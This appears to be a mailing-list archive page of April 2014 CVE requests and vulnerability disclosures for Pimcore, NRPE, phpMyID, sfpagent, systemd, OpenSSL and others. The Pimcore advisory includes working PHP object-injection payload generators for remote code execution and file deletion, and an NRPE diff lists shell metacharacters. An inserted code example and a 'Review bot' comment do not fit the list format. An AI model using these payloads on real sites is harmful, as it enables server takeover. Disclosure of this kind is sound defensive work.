Pedro Ribeiro | 19 Apr 12:54 2014

CVE request: Fwd: Remote code execution in Pimcore CMS

Resending this as it hasn't been picked up most likely because of the lack of "CVE request" in the subject line.


---------- Forwarded message ----------
From: "Pedro Ribeiro" <>
Date: 14 Apr 2014 10:16
Subject: Remote code execution in Pimcore CMS
To: <>
Cc: "Bernhard Rusch" <>


I have discovered a PHP object injection in Pimcore CMS.

Depending on the PHP version under which Pimcore is running, it is possible to achieve remote code execution in the worst case, and arbitrary file deletion at best.

Please find attached the report, which is also available at

Can you please provide a CVE number for this?

Thanks in advance.


> Vulnerabilities in Pimcore 1.4.9 to 2.1.0 (inclusive)
> Discovered by Pedro Ribeiro (pedrib <at> of Agile Information Security

Vulnerability: Remote code execution in Pimcore CMS via unserialize() PHP object injection (CVE-HERE)
File(line): pimcore/lib/Pimcore/Tool/Newsletter.php(221)

This vulnerability can be exploited by sending a base64 encoded payload as the "token" parameter to the
newsletter unsubscribe page of the target site. Payload [1] abuses several Zend classes to achieve
remote code execution (based on Stefan Esser's technique in [2] and Egidio Romano's exploit code from
[3]). Payload [4] abuses Zend_Http_Response_Stream to delete a file in /tmp/deleteme and works in all
PHP versions.

Versions affected:
1.4.9 to 1.4.10 (inclusive): Remote code execution (when server is running PHP <= 5.3.3). 
1.4.9 to 2.1.0 (inclusive): Arbitrary file deletion (any PHP version), POSSIBLY remote code execution.
Version 2.2.0 or higher resolves this vulnerability.

Due to changes introduced in PHP 5.3.4 to reject file names with null bytes, payload [3] does not work on
Pimcore versions between 2.0.1 and 2.1.0 as Pimcore enforces a PHP 5.4 requirement. Version 2.0.0 might
be vulnerable if anyone is running it on PHP versions <= 5.3.3... which according to the developers is not
possible, but the requirement was only enforced in 2.0.1.
Note, however, that the underlying vulnerability for both the remote code execution and the arbitrary file
deletion is the same (unserialize() object injection), so it might be possible to execute code if any
other Zend PHP POP chains are found in the future.

Fix for vulnerability:

Newsletter.php added to repository on February 25th 2013 (was released in 1.4.9 on 02/Mar/13):

PHP 5.4 requirement introduced on October 31st 2013 (was released in 2.0.1 on 20/Dec/13):

Code snippets:


    public function getObjectByToken($token) {
        $data = unserialize(base64_decode($token));
        if($data) {
            if($object = Object_Abstract::getById($data["id"])) {

                if($version = $object->getLatestVersion()) {
                    $object = $version->getData();

This function is called in the same file in confirm() and unsubscribeByToken():
    public function confirm($token) {

        $object = $this->getObjectByToken($token);
        if($object) {

    public function unsubscribeByToken ($token) {

        $object = $this->getObjectByToken($token);
        if($object) {

In the Pimcore Wiki[5] and sample site[6], users are shown how to use the token parameter and are encouraged
to take the sample code and modify it.
The sample code passes the token directly without any validation in confirmAction():
    public function confirmAction() {


        $this->view->success = false;

        $newsletter = new Pimcore_Tool_Newsletter("person"); // replace "crm" with the class name you have used for your class above (mailing list)

        if($newsletter->confirm($this->getParam("token"))) {
            $this->view->success = true;

And also in unsubscribeAction():
    public function unsubscribeAction() {


        $newsletter = new Pimcore_Tool_Newsletter("person"); // replace "crm" with the class name you have used for your class above (mailing list)

        $unsubscribeMethod = null;
        $success = false;

        if($this->getParam("email")) {
            $unsubscribeMethod = "email";
            $success = $newsletter->unsubscribeByEmail($this->getParam("email"));

        if($this->getParam("token")) {
            $unsubscribeMethod = "token";
            $success = $newsletter->unsubscribeByToken($this->getParam("token"));

Do not pass untrusted input into the unserialize function. Use JSON encoding / decoding instead of
unserialize. This was introduced in commit 3cb2683e669 and released in version 2.2.0.

[1] Remote code execution, PHP <= 5.3.3, original code from [3] (Egidio Romano)

class Zend_Search_Lucene_Index_FieldInfo {
    public $name = '<?php phpinfo(); die;?>';
}

class Zend_Search_Lucene_Storage_Directory_Filesystem {
    protected $_dirPath = null;

    public function __construct($path) {
        $this->_dirPath = $path;
    }
}

interface Zend_Pdf_ElementFactory_Interface {}

class Zend_Search_Lucene_Index_SegmentWriter_StreamWriter implements Zend_Pdf_ElementFactory_Interface {
    protected $_docCount = 1;
    protected $_name = 'foo';
    protected $_directory;
    protected $_fields;
    protected $_files;

    public function __construct($directory, $fields) {
        $this->_directory = $directory;
        $this->_fields    = array($fields);
        $this->_files     = new stdClass;
    }
}

class Zend_Pdf_ElementFactory_Proxy {
    private $_factory;

    public function __construct(Zend_Pdf_ElementFactory_Interface $factory) {
        $this->_factory = $factory;
    }
}

// This null byte technique only works in PHP <= 5.3.3
$directory = new Zend_Search_Lucene_Storage_Directory_Filesystem("/var/www/malicious.php\0");
$__factory = new Zend_Search_Lucene_Index_SegmentWriter_StreamWriter($directory, new Zend_Search_Lucene_Index_FieldInfo);
$____proxy = new Zend_Pdf_ElementFactory_Proxy($__factory);

echo base64_encode(serialize($____proxy));


[4] Arbitrary file deletion, all PHP versions
class Zend_Http_Response_Stream {
    protected $stream;
    protected $stream_name;
    protected $_cleanup;

    public function setStream($stream) {
        $this->stream = $stream;
        return $this;
    }
    public function setCleanup($cleanup = true) {
        $this->_cleanup = $cleanup;
    }
    public function setStreamName($stream_name) {
        $this->stream_name = $stream_name;
        return $this;
    }
}

$resp = new Zend_Http_Response_Stream();

echo base64_encode(serialize($resp));

[6] Downloadable from the Pimcore website (
The file mentioned is website/controllers/NewsletterController.php.

Other references:
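As an added illustration (not Pimcore's code, and not from the advisory above), here is the token parsing before and after the fix the report describes, contrasting unserialize() with JSON decoding plus shape validation; the function names are hypothetical, the tokens are constructed (a plain stdClass stands in for a real gadget), and PHP 7.1 or later is assumed:

```php
<?php
// Added example, not Pimcore's code. Function names are hypothetical.

// Before the fix: the decoded token goes straight into unserialize(), so any
// autoloadable class can be instantiated with attacker-chosen property values.
// (PHP 7+ also offers unserialize($raw, ['allowed_classes' => false]) as a stopgap.)
function getTokenDataVulnerable(string $token)
{
    return unserialize(base64_decode($token));
}

// After the fix: JSON carries no class information, so decoding can only yield
// scalars and arrays. The result is then checked against the exact shape the
// newsletter code needs (an integer object id and an email string).
function getTokenDataFixed(string $token): ?array
{
    $raw = base64_decode($token, true);           // strict mode rejects non-base64 input
    if ($raw === false) {
        return null;
    }
    $data = json_decode($raw, true, 2);           // associative arrays only, depth 2
    if (json_last_error() !== JSON_ERROR_NONE || !is_array($data)) {
        return null;                              // serialized objects fail here
    }
    if (!isset($data['id'], $data['email'])
        || !is_int($data['id']) || !is_string($data['email'])) {
        return null;                              // unexpected shape or types
    }
    return ['id' => $data['id'], 'email' => $data['email']];
}

// Constructed inputs: a legitimate JSON token and a serialized-object token of the
// kind the advisory describes; a harmless stdClass is used instead of a Zend gadget.
$good = base64_encode(json_encode(['id' => 42, 'email' => 'user@example.com']));
$obj = new stdClass;
$obj->name = 'attacker-controlled';
$bad = base64_encode(serialize($obj));

$vuln = getTokenDataVulnerable($bad);
printf("unserialize() path: token produced a %s\n",
    is_object($vuln) ? get_class($vuln) : gettype($vuln));
printf("json path, object token: %s\n", var_export(getTokenDataFixed($bad), true));
printf("json path, legitimate token: %s\n", var_export(getTokenDataFixed($good), true));
```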
Matthew Daley | 19 Apr 02:51 2014

CVE request / advisory: gdomap (GNUstep core package <= 1.24.6)


I'd like to request a CVE ID for this issue. It was found in software
from GNUstep (, which develops an open-source
development framework and runtime for client and server applications.

This is the first such request and the issue is (now) public; this
message serves as an advisory as well.

Affected software: gdomap (GNUstep Distributed Objects nameserver)
Description: After receiving a crafted invalid request, gdomap will
attempt to log an error message to the system logger. However, due to
incorrect setup of the logger during server initialization, the logger
and gdomap itself will mess up program state enough that program
execution will be aborted. gdomap listens to all interfaces, allowing
a remote unauthenticated attacker to DoS the nameserver. (Please see
the bug tracker entry for more detailed information.)
Bug tracker:
Affected versions: current releases (GNUstep core package <= 1.24.6)
Release notes:
Reported by: Matthew Daley

Please let me know if you need any further information.


- Matthew Daley

Forest Monsen | 18 Apr 19:40 2014

CVE Request for Drupal Core

Hi there,

Please issue a CVE identifier for:

SA-CORE-2014-002 - Drupal core - Information Disclosure


Eduardo Tongson | 18 Apr 04:14 2014

CVE Request: Nagios Remote Plugin Executor <= 2.15 Remote Command Execution

This is similar to CVE-2013-1362

Is there a CVE already assigned for this issue?


--- nrpe/src/nrpe.c
+++ nrpe/src/nrpe.c
 <at>  <at>  -42,7 +42,7  <at>  <at>  int use_ssl=FALSE;

 #define DEFAULT_COMMAND_TIMEOUT    60            /* default timeout
for execution of plugins */
 #define MAXFD                   64
-#define NASTY_METACHARS         "|`&><'\"\\[]{};"
+#define NASTY_METACHARS         "|`&><'\"\\[]{};\n"

 char    *command_name=NULL;
 char    *macro_argv[MAX_COMMAND_ARGUMENTS];
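Review bot: the change to NASTY_METACHARS closes the newline case but leaves the check a denylist, and the visible list still omits characters the shell treats specially (for example `$` and `\r`); rather than growing the list, the safer fix is to stop routing plugin arguments through a shell at all (exec the plugin with an argv array) and keep the metacharacter check only as defence in depth. The hunk should also document why `\n` matters here (the newline terminates the command line the shell sees), since the `#define` alone does not explain it.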

Raphael Geissert | 17 Apr 14:13 2014

CVE ids for CyaSSL 2.9.4?


[CC'ing Ivan Fratric and one of the many @wolfssl addresses I found]

CyaSSL 2.9.4 fixes a number of security issues.

From [3]:
> Issue #1 (Memory  Corruption)
> Issue #2 (Out of bounds read)
> Issue #3 (Dangerous Default Behavior, out of bounds read)
> Issue #4 (NULL pointer dereference)
> Issue #5 (Unknown Critical Certificate Extension Allowed)

Have CVE ids been assigned already? if not, could they be assigned?

Thanks in advance.



Raphael Geissert - Debian Developer -

Marc Deslauriers | 17 Apr 13:39 2014

CVE Request: systemd stack-based buffer overflow in systemd-ask-password


From the Red Hat bug:
A stack-based buffer overflow was found in systemd-ask-password, a utility used
to query a system password or passphrase from the user, using a question message
specified on the command line. A local user could use this flaw to crash the binary
or even execute arbitrary code with the permissions of the user running the program.

Bug report:


Could a CVE please be assigned to this issue?




Marc Deslauriers
Ubuntu Security Engineer     |
Canonical Ltd.               |

Adam Caudill | 17 Apr 07:25 2014

CVE Request - XSS in phpMyID (openid_error)

There is an XSS vulnerability in phpMyID v0.9, in the openid_error parameter. The value passed into
openid_error is passed through to the output without modification when openid.mode is "error".


Here is the code at fault:

MyID.php Line 569:
  function error_mode () {
  		? wrap_html($_REQUEST['openid_error'])
  		: error_500();

MyID.php Line 1559:
  function wrap_html ( $message ) {
  	global $charset, $profile;

  	header('Content-Type: text/html; charset=' . $charset);
  	echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "">
  <link rel="openid.server" href="' . $profile['req_url'] . '" />
  <link rel="openid.delegate" href="' . $profile['idp_url'] . '" />
  ' . implode("\n", $profile['opt_headers']) . '
  <meta name="charset" content="' . $charset . '" />
  <meta name="robots" content="noindex,nofollow" />
  <p>' . $message . '</p>


Project Page:

The author has stated that the project is no longer maintained, so hasn’t been notified, and thus there is
no fixed version. This is being submitted to raise awareness among those that use this application, and in
hopes that a new maintainer will take the project over and address the outstanding issues.


Adam Caudill

Raphael Geissert | 16 Apr 22:10 2014

CVE request: openssl: missing critical flag for extended key usage not always detected in time-stamp verification


Quoting from [0]:
> "check_purpose_timestamp_sign()" in source file v3_purp.c [...] fails to
> detect a missing critical flag if the extensions of the TSA certificate
> are arranged in a specific order.

Could a CVE id be assigned for this?

The referenced commit fixes it "and to two other cases in the same file."


Digging through history, the bug on TSA was introduced in 
(Strangely tagged for 0.9.8l and 0.9.8k but none of the other versions of 
the 0.9.8 branch)

And the two others in:
(going all the way back to 0.9.7)

Haven't checked if the meaning of the X509_get_ext_by_NID parameter changed 
at some point.


Raphael Geissert - Debian Developer -

Źmicier Januszkiewicz | 16 Apr 13:36 2014

libmms heap-based buffer overflow fix

Hello list,

It seems libmms has fixed a buffer overflow in a recent 0.6.4 version
with the following commit.

This may be triggered via an overly long line of a MMSH (MMS over
HTTP) server response, effectively overflowing the buffer which has a
static size (defined as BUF_SIZE, didn't check the actual numeric

Please assign a CVE name for this, if there is none.

Kind regards,

Murray McAllister | 16 Apr 06:26 2014

CVE request: insecure temporary file handling in clang's scan-build utility


Jakub Wilk discovered that clang's scan-build utility insecurely handled 
temporary files. Full details in his report:

Can a CVE please be assigned?


Murray McAllister / Red Hat Security Response Team

Larry W. Cashdollar | 16 Apr 02:02 2014

Remote Command Injection in Ruby Gem sfpagent 0.4.14

Title: Remote Command Injection in Ruby Gem sfpagent 0.4.14

Date: 4/15/2014

Author: Larry W. Cashdollar, @_larry0

CVE: Please assign one at your leisure. 


The list variable generated from the user supplied JSON[body] input is passed directly to the system()
shell on line 649. If a user supplies a module name with shell metacharacters like ; they might be able to
execute shell commands on the remote system as the sfpagent running user id.
I think to fix this you'd need to sanitize all input from the user with shellwords.escape.

637                         code, body = get_data(address, port, '/modules')
638                         raise Exception, "Unable to get modules list from #{name}" if code.to_i != 200
640                         modules = JSON[body]
641                         list = ''
642                         schemata.each { |m|
643                                 list += "#{m} " if File.exist?("#{modules_dir}/#{m}") and
644                                                    (not modules.has_key?(m) or modules[m] != get_local_module_hash(m, modules_dir).to_s)
645                         }
647                         return true if list == ''
649                         if system("cd #{modules_dir}; #{install_module} #{address} #{port} #{list} 1>/dev/null 2>/tmp/install_module.error")
650                                 "Push modules #{list}to #{name} [OK]"
651                         else
652                                 Sfp::Agent.logger.warn "Push modules #{list}to #{name} [Failed]"
653                         end
655                         return true

Vendor: Notified 4/15/14. Version 0.4.15 fixes this issue.